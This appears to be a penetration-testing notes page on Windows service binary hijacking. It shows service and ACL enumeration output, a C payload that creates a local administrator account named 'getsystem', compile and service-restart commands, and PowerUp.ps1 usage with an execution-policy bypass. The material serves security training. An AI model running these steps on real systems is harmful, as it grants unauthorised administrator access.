Service Binary Hijacking
We start PowerShell and choose Get-CimInstance to query the WMI class win32_service. We are interested in the name, state, and path of the binaries for each service and therefore, use Select with the arguments Name, State, and PathName. In addition, we filter out any services that are not in a Running state by using Where-Object.
When using a network logon such as WinRM or a bind shell, Get-CimInstance and Get-Service will result in a "permission denied" error when querying for services with a non-administrative user. Using an interactive logon such as RDP solves this problem.
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} PS C:\Users\root> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Name State PathName
---- ----- --------
AppXSvc Running C:\Windows\system32\svchost.exe -k wsappx -p
AudioEndpointBuilder Running C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p
Audiosrv Running C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
BFE Running C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
BrokerInfrastructure Running C:\Windows\system32\svchost.exe -k DcomLaunch -p
BTAGService Running C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
BthAvctpSvc Running C:\Windows\system32\svchost.exe -k LocalService -p
bthserv Running C:\Windows\system32\svchost.exe -k LocalService -p
camsvc Running C:\Windows\system32\svchost.exe -k appmodel -p
CDPSvc Running C:\Windows\system32\svchost.exe -k LocalService -p
ClipSVC Running C:\Windows\System32\svchost.exe -k wsappx -p
COMSysApp Running C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
CoreMessagingRegistrar Running C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
CryptSvc Running C:\Windows\system32\svchost.exe -k NetworkService -picacls AND Get-ACL
Mask Permissions :
F Full access
M Modify access
RX Read and execute access
R Read-only access
W Write-only access
PS C:\Users\root> icacls C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe NT SERVICE\TrustedInstaller:(F)
BUILTIN\Administrators:(RX)
NT AUTHORITY\SYSTEM:(RX)
BUILTIN\Users:(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(RX)
Successfully processed 1 files; Failed processing 0 files
PS C:\Users\root> get-acl C:\Windows\system32\svchost.exe
Directory: C:\Windows\system32
Path Owner Access
---- ----- ------
svchost.exe NT SERVICE\TrustedInstaller NT AUTHORITY\SYSTEM Allow ReadAndExecute, Synchronize...
Example
PS C:\Users\root> icacls "C:\xampp\mysql\bin\mysqld.exe"
C:\xampp\mysql\bin\mysqld.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
Successfully processed 1 files; Failed processing 0 filesExample Payload
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user getsystem getsystem /add");
i = system ("net localgroup administrators getsystem /add");
return 0;
}x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
Example
net stop mysql
sc start mysql
sc qc mysql
PS C:\Users\root> Get-CimInstance -ClassName win32_service | Select Name, StartMode |Where-Object {$_.Name -like 'mysql'}shutdown /r /t 0
Using PowerUp.ps1
PS C:\Users\root> powershell -ep bypass
PS C:\Users\root> . .\PowerUp.ps1
PS C:\Users\root> Invoke-AllChecks
or
PS C:\Users\root> Get-ModifiableServiceFile
PS C:\Users\root> Install-ServiceBinary -Name 'mysql'
or
PS C:\Users\root> $ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe' | Get-ModifiablePath -Literal
PS C:\Users\root> $ModifiableFiles
Last updated